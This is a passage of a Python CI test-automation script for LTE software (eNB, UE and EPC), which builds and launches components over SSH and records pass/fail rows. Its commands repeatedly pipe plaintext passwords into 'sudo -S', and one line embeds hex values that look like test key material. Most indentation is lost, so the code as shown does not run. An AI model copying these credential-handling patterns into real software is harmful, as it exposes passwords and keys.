result = re.search('build_oai', str(self.ssh.before))
if result is None:
buildOAIprocess = False
else:
count -= 1
time.sleep(30)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.backgroundBuildTestId[int(self.eNB_instance)])
def checkBuildeNB(self, lIpAddr, lUserName, lPassWord, lSourcePath, testcaseId):
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
buildStatus = False
else:
# Generating a BUILD INFO file
self.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
self.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
self.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('mkdir -p build_log_' + testcaseId, '\$', 5)
self.command('mv log/* ' + 'build_log_' + testcaseId, '\$', 5)
self.command('mv compile_oai_enb.log ' + 'build_log_' + testcaseId, '\$', 5)
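		# When building on a secondary eNB server, zip the build logs and bring them back to the
		# primary eNB server so that all artifacts are collected in one place.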
if self.eNB_serverId != '0':
self.command('cd cmake_targets', '\$', 5)
self.command('if [ -e tmp_build' + testcaseId + '.zip ]; then rm -f tmp_build' + testcaseId + '.zip; fi', '\$', 5)
self.command('zip -r -qq tmp_build' + testcaseId + '.zip build_log_' + testcaseId, '\$', 5)
self.close()
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
os.remove('./tmp_build' + testcaseId + '.zip')
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/tmp_build' + testcaseId + '.zip', '.')
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './tmp_build' + testcaseId + '.zip', self.eNBSourceCodePath + '/cmake_targets/.')
os.remove('./tmp_build' + testcaseId + '.zip')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets', '\$', 5)
self.command('unzip -qq -DD tmp_build' + testcaseId + '.zip', '\$', 5)
self.command('rm -f tmp_build' + testcaseId + '.zip', '\$', 5)
self.close()
else:
self.close()
if buildStatus:
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
else:
logging.error('\u001B[1m Building OAI eNB Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_eNB_args, 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
sys.exit(1)
def BuildOAIUE(self):
if self.UEIPAddress == '' or self.ranRepository == '' or self.ranBranch == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('mkdir -p ' + self.UESourceCodePath, '\$', 5)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
		# TODO: check here whether the git clone or git fetch completed successfully
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
		# if a commit ID is provided, use it to check out that exact revision
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
		# if the branch is not develop, then this is a merge request and we need to perform
		# the potential merge. Note that merge conflicts should already have been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
		# no need to clean the log directory (git clean already did the trick)
self.command('stdbuf -o0 ./build_oai ' + self.Build_OAI_UE_args + ' 2>&1 | stdbuf -o0 tee compile_oai_ue.log', 'Bypassing the Tests|build have failed', 600)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
buildStatus = False
self.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
self.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
self.command('mv compile_oai_ue.log ' + 'build_log_' + self.testCase_id, '\$', 5)
self.close()
if buildStatus:
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
else:
logging.error('\u001B[1m Building OAI UE Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'KO', ALL_PROCESSES_OK, 'OAI UE')
self.CreateHtmlTabFooter(False)
sys.exit(1)
def InitializeHSS(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS')
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_hss 2>&1 | stdbuf -o0 awk \'{ print strftime("[%Y/%m/%d %H:%M:%S] ",systime()) $0 }\' | stdbuf -o0 tee -a hss_' + self.testCase_id + '.log &', 'Core state: 2 -> 3', 35)
else:
logging.debug('Using the ltebox simulated HSS')
self.command('if [ -d ' + self.EPCSourceCodePath + '/scripts ]; then echo ' + self.eNBPassword + ' | sudo -S rm -Rf ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('mkdir -p ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('cd /opt/hss_sim0609', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss.log daemon.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "Starting sudo session" && sudo daemon --unsafe --name=simulated_hss --chdir=/opt/hss_sim0609 ./starthss_real ', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeMME(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('stdbuf -o0 hostname', '\$', 5)
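			# Parse the hostname out of the pexpect buffer (command echo followed by its output)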
result = re.search('hostname\\\\r\\\\n(?P<host_name>[a-zA-Z0-9\-\_]+)\\\\r\\\\n', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m Hostname Not Found! \u001B[0m')
sys.exit(1)
host_name = result.group('host_name')
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_mme 2>&1 | stdbuf -o0 tee -a mme_' + self.testCase_id + '.log &', 'MME app initialization complete', 100)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeSPGW(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_spgw 2>&1 | stdbuf -o0 tee -a spgw_' + self.testCase_id + '.log &', 'Initializing SPGW-APP task interface: DONE', 30)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def CheckFlexranCtrlInstallation(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
return
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ls -ls /opt/flexran_rtc/*/rt_controller', '\$', 5)
result = re.search('/opt/flexran_rtc/build/rt_controller', str(self.ssh.before))
if result is not None:
self.flexranCtrlInstalled = True
logging.debug('Flexran Controller is installed')
self.close()
def InitializeFlexranCtrl(self):
if self.flexranCtrlInstalled == False:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f log/*.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "build/rt_controller -c log_config/basic_log" > ./my-flexran-ctl.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 755 ./my-flexran-ctl.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --unsafe --name=flexran_rtc_daemon --chdir=/opt/flexran_rtc -o /opt/flexran_rtc/log/flexranctl_' + self.testCase_id + '.log ././my-flexran-ctl.sh', '\$', 5)
self.command('ps -aux | grep --color=never rt_controller', '\$', 5)
result = re.search('rt_controller -c ', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m Initialize FlexRan Controller Completed\u001B[0m')
self.flexranCtrlStarted = True
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeeNB(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = False
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_eNB_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
		# If the T tracer option is on, run tshark on the EPC side to capture traffic between the EPC and the eNB
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ip addr show | awk -f /tmp/active_net_interfaces.awk | egrep -v "lo|tun"', '\$', 5)
result = re.search('interfaceToUse=(?P<eth_interface>[a-zA-Z0-9\-\_]+)done', str(self.ssh.before))
if result is not None:
eth_interface = result.group('eth_interface')
logging.debug('\u001B[1m Launching tshark on interface ' + eth_interface + '\u001B[0m')
self.EPC_PcapFileName = 'enb_' + self.testCase_id + '_s1log.pcap'
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "host ' + lIpAddr +'" -i ' + eth_interface + ' -w /tmp/' + self.EPC_PcapFileName + ' > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.close()
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath, '\$', 5)
		# Initialize_eNB_args usually starts with -O followed by the config file location in the repository
full_config_file = self.Initialize_eNB_args.replace('-O ','')
extra_options = ''
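		# Split the argument into the .conf file path and any extra options passed after it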
extIdx = full_config_file.find('.conf')
if (extIdx > 0):
extra_options = full_config_file[extIdx + 5:]
			# if the T tracer option is on, compile and launch the T Tracer recorder
result = re.search('T_stdout', str(extra_options))
if result is not None:
logging.debug('\u001B[1m Compiling and launching T Tracer\u001B[0m')
self.command('cd common/utils/T/tracer', '\$', 5)
self.command('make', '\$', 10)
self.command('echo $USER; nohup ./record -d ../T_messages.txt -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.raw -ON -off VCD -off HEAVY -off LEGACY_GROUP_TRACE -off LEGACY_GROUP_DEBUG > ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.log 2>&1 &', lUserName, 5)
self.command('cd ' + lSourcePath, '\$', 5)
full_config_file = full_config_file[:extIdx + 5]
config_path, config_file = os.path.split(full_config_file)
else:
sys.exit('Insufficient Parameter')
ci_full_config_file = config_path + '/ci-' + config_file
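		# RRU/RCC/DU configs do not report 'got sync' themselves; for those we wait for the
		# 'wait RUs' message instead (see the polling loop below)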
rruCheck = False
result = re.search('^rru|^rcc|^du.band', str(config_file))
if result is not None:
rruCheck = True
# do not reset board twice in IF4.5 case
result = re.search('^rru|^enb|^du.band', str(config_file))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + lPassWord + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
				# Reloading the FPGA bin firmware
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 15)
# Make a copy and adapt to EPC / eNB IP addresses
self.command('cp ' + full_config_file + ' ' + ci_full_config_file, '\$', 5)
self.command('sed -i -e \'s/CI_MME_IP_ADDR/' + self.EPCIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_ENB_IP_ADDR/' + lIpAddr + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RCC_IP_ADDR/' + self.eNBIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU1_IP_ADDR/' + self.eNB1IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU2_IP_ADDR/' + self.eNB2IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "yes";/\' ' + ci_full_config_file, '\$', 2);
else:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "no";/\' ' + ci_full_config_file, '\$', 2);
# Launch eNB with the modified config file
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo "ulimit -c unlimited && ./lte_build_oai/build/lte-softmodem -O ' + lSourcePath + '/' + ci_full_config_file + extra_options + '" > ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S rm -Rf enb_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=enb' + str(self.eNB_instance) + '_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '.log ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.eNBLogFiles[int(self.eNB_instance)] = 'enb_' + self.testCase_id + '.log'
if extra_options != '':
self.eNBOptions[int(self.eNB_instance)] = extra_options
time.sleep(6)
doLoop = True
loopCounter = 10
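		# Wait up to ~60 seconds (10 polls, 6 seconds apart) for the eNB log to show 'got sync'
		# (or 'wait RUs' for an RRU/RCC/DU configuration)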
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
				# In case of T tracer recording, we may need to kill the record process
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.command('killall --signal SIGKILL record', '\$', 5)
self.close()
doLoop = False
logging.error('\u001B[1;37;41m eNB logging system did not show got sync! \u001B[0m')
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'KO', ALL_PROCESSES_OK)
				# In case of T tracer recording, we need to kill tshark on the EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
if self.EPC_PcapFileName != '':
time.sleep(0.5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.close()
time.sleep(1)
if self.EPC_PcapFileName != '':
copyin_res = self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
if (copyin_res == 0):
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.prematureExit = True
return
else:
self.command('stdbuf -o0 cat enb_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync|Starting"', '\$', 4)
if rruCheck:
result = re.search('wait RUs', str(self.ssh.before))
else:
result = re.search('got sync|Starting F1AP at CU', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'OK', ALL_PROCESSES_OK)
logging.debug('\u001B[1m Initialize eNB Completed\u001B[0m')
time.sleep(10)
self.close()
def InitializeUE_common(self, device_id):
logging.debug('send adb commands')
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# enable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell svc data enable', '\$', 60)
# The following commands are deprecated since we no longer work on Android 7+
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
# a dedicated script has to be installed inside the UE
# airplane mode on means call /data/local/tmp/off
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
			# airplane mode off means call /data/local/tmp/on
logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target = self.InitializeUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeOAIUE(self):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
# b2xx_fx3_utils reset procedure
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + self.UEPassword + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
			# Reloading the FPGA bin firmware
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 15)
else:
logging.debug('Did not find any B2xx device')
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets/lte_build_oai/build', '\$', 5)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
# We may have to regenerate the .u* files
if result is None:
self.command('sed -e "s#93#92#" -e "s#8baf473f2f8fd09487cccbd7097c6862#fec86ba6eb707ed08905757b1bb44b8f#" -e "s#e734f8734007d6c5ce7a0508809e7e9c#C42449363BBAD02B66D16BC975D77CC1#" ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf .u*', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S ../../../targets/bin/conf2uedata -c ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf -o .', '\$', 5)
# Launch UE with the modified config file
self.command('echo "ulimit -c unlimited && ./lte-uesoftmodem ' + self.Initialize_OAI_UE_args + '" > ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.UELogFile = 'ue_' + self.testCase_id + '.log'
		# We now loop several times, hoping the UE really syncs with an eNB
doOutterLoop = True
outterLoopCounter = 5
gotSyncStatus = True
fullSyncStatus = True
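		# Outer loop: restart the UE softmodem up to 5 times; the inner loops first wait for the
		# 'got sync' message and then make sure 'No cell synchronization found' does not show up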
while (doOutterLoop):
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S -E daemon --inherit --unsafe --name=ue' + str(self.UE_instance) + '_daemon --chdir=' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build -o ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
time.sleep(6)
self.command('cd ../..', '\$', 5)
doLoop = True
loopCounter = 10
gotSyncStatus = True
			# the 'got sync' message indicates that the UE threads are synchronized
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
					# This should never occur
logging.error('"got sync" message never showed!')
gotSyncStatus = False
doLoop = False
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('got sync', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
logging.debug('Found "got sync" message!')
if gotSyncStatus == False:
# we certainly need to stop the lte-uesoftmodem process if it is still running!
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
time.sleep(3)
				# We now check whether sync with the eNB did NOT occur:
				# during the cell-search stage, the UE typically logs a 'No cell synchronization found' message
doLoop = True
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
						# At this point there is a good chance that the UE did cell-sync with the eNB
doLoop = False
doOutterLoop = False
fullSyncStatus = True
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('No cell synchronization found', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
fullSyncStatus = False
logging.debug('Found: "No cell synchronization" message! --> try again')
time.sleep(6)
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
outterLoopCounter = outterLoopCounter - 1
if (outterLoopCounter == 0):
doOutterLoop = False
if fullSyncStatus and gotSyncStatus:
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
self.command('ifconfig oaitun_ue1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_ue1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = True
else:
logging.error('\u001B[1m oaitun_ue1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
else:
tunnelInterfaceStatus = True
self.close()
if fullSyncStatus and gotSyncStatus and tunnelInterfaceStatus:
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
logging.debug('\u001B[1m Initialize OAI UE Completed\u001B[0m')
else:
self.htmlUEFailureMsg = 'oaitun_ue1 interface is either NOT mounted or NOT configured'
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', OAI_UE_PROCESS_NO_TUNNEL_INTERFACE, 'OAI UE')
logging.error('\033[91mInitialize OAI UE Failed! \033[0m')
self.AutoTerminateUEandeNB()
def checkDevTTYisUnlocked(self):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
count = 0
while count < 5:
self.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
result = re.search('picocom', str(self.ssh.before))
if result is None:
count = 10
else:
time.sleep(5)
count = count + 1
self.close()
def InitializeCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
		# dummy call to start a sudo session; the picocom command does not handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
		# Calling AT twice to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
# Checking if auto-attach is enabled
self.command('AT^AUTOATT?', 'OK', 5)
result = re.search('AUTOATT: (?P<state>[0-9\-]+)', str(self.ssh.before))
if result is not None:
if result.group('state') is not None:
autoAttachState = int(result.group('state'))
if autoAttachState is not None:
if autoAttachState == 0:
self.command('AT^AUTOATT=1', 'OK', 5)
logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
		# Force closure of picocom; the device might still be locked
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
		# dummy call to start a sudo session; the picocom command does not handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
		# Calling AT twice to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
		# dummy call to start a sudo session; the picocom command does not handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
		# Calling AT twice to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Enabling the Radio
self.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
		# Check whether the module registers with the network
count = 0
